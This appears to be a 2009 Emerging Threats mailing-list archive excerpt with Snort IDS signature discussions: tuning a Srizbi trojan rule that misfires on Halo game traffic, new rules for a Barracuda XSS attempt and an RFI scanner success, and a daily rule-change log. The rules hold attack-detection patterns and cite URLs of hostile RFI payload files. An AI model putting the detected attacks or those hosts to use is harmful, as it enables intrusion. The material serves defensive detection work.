> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com  Fri Dec 11 21:26:38 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 21:26:38 -0500
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi
	registering	withcontroller
In-Reply-To: <4B1D8CBC.1060208@packetmail.net>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
Message-ID: <4B22FF5E.70107@jonkmans.com>

Looks good, lets test...

Matt

On 12/7/09 6:16 PM, evilghost at packetmail.net wrote:
> It's Halo; 
> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
> 
> Perhaps a negated content against content:!"|00|server."; offset:44; on 
> SID 2007711?
> 
> Double-check my offset please.
> 
> -evilghost
> 
> CunningPike wrote:
>> I'm seeing alerts on this rule associated with what I think is Halo
>> online game activity - anyone else? The port involved is 2302.
>>
>> This is the sort of traffic we are seeing on the wire after the rule
>> fires an alert:
>>
>> Count:1 Event#5.347574 2009-12-06 20:19:13
>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>> 67.161.16.105 -> 192.168.132.103
>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>> Protocol: 17 sport=2302 -> dport=1110
>>
>> len=93 chksum=28461
>> Payload:
>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>> 00 30 00 31 00                                  .0.1.
>>
>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>
>> CP
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>   
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com  Fri Dec 11 21:30:37 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 21:30:37 -0500
Subject: [Emerging-Sigs] SIG: Barracuda IM Firewall XSS
In-Reply-To: <e75cc74a0912110641t6b03130en82d3503c6d21aaa2@mail.gmail.com>
References: <e75cc74a0912110641t6b03130en82d3503c6d21aaa2@mail.gmail.com>
Message-ID: <4B23004D.3060809@jonkmans.com>

Posted!

Thanks

Matt

On 12/11/09 9:41 AM, Kevin Ross wrote:
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
> Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting
> Attempt"; flow:established,to_server;
> uricontent:"|2F|cgi|2D|mod|2F|smtp|5F|test|2E|cgi"; nocase;
> uricontent:"email|3D|"; nocase; uricontent:"hostname|3D|"; nocase;
> uricontent:"default|5F|domain|3D|"; nocase;
> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
> classtype:web-application-attack;
> reference:url,www.securityfocus.com/bid/37248/info
> <http://www.securityfocus.com/bid/37248/info>; sid:19000002; rev:1;)

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com  Fri Dec 11 21:32:38 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 21:32:38 -0500
Subject: [Emerging-Sigs] RFI exploit successful
In-Reply-To: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>
References: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>
Message-ID: <4B2300C6.20107@jonkmans.com>

Ya, we can run that in current for a while. Good observation, thanks Mike.

Matt

On 12/11/09 9:14 AM, Mike Cox wrote:
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET
> CURRENT_EVENTS RFI Scanner Success (Fx29ID)";
> flow:established,from_server; content:"FeeLCoMzFeeLCoMz";
> classtype:successful-user; reference:url,kb27.co.kr/data/id1.txt
> <http://kb27.co.kr/data/id1.txt>; reference:url,n34.biz/id1.txt
> <http://n34.biz/id1.txt>; sid:2010xxx; rev:1;)

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net  Sat Dec 12 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 12 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091212210012.B0EC44504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat Dec 12 16:00:12 2009 [***]

[+++]          Added rules:          [+++]

 2010462 - ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt (emerging-web_server.rules)
 2010463 - ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) (emerging-current_events.rules)


[///]     Modified active rules:     [///]

 2003466 - ET WEB_SERVER PHP Attack Tool Morfeus F Scanner (emerging-web_server.rules)
 2007711 - ET TROJAN Srizbi registering with controller (emerging-virus.rules)
 2009799 - ET WEB_SERVER PHP Attack Tool Morfeus F Scanner - M (emerging-web_server.rules)
 2010459 - ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt (emerging-web_server.rules)
 2010460 - ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt (emerging-web_server.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (114):
        2010462 || ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt || url,www.securityfocus.com/bid/37248/info
        2010463 || ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) || url,n34.biz/id1.txt || url,kb27.co.kr/data/id1.txt
        2500382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (114):
        2010462 || ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt || url,www.securityfocus.com/bid/37248/info
        2010463 || ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) || url,n34.biz/id1.txt || url,kb27.co.kr/data/id1.txt
        2500382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
